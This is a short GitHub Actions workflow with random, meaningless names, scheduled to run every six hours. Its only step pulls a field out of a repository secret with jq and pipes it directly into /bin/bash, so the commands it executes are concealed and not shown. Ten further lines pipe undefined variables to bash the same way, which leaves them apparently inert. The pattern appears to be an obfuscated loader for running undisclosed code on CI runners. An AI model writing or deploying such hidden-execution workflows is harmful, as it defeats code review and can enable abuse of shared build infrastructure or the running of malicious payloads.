name: mouqiumm
on:
  workflow_dispatch:
  schedule:
    - cron: '55 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mouqiumm
        env:
          jvcoe98: ${{ secrets.jvcoe98 }}
        run: |
          echo $jvcoe98 | jq -r .oc8 | /bin/bash
          echo $ycte029 | jq -r .vay4338 | /bin/bash
          echo $jym0 | jq -r .z2832 | /bin/bash
          echo $scxjm07 | jq -r .zcbxt64 | /bin/bash
          echo $wdo55256 | jq -r .mwe33 | /bin/bash
          echo $leahy2 | jq -r .rb40 | /bin/bash
          echo $afd8 | jq -r .psx299 | /bin/bash
          echo $lsoez5549 | jq -r .hpmy1 | /bin/bash
          echo $vh67 | jq -r .gd5348 | /bin/bash
          echo $mv24340 | jq -r .sga63 | /bin/bash
          echo $cg87 | jq -r .mi819 | /bin/bash

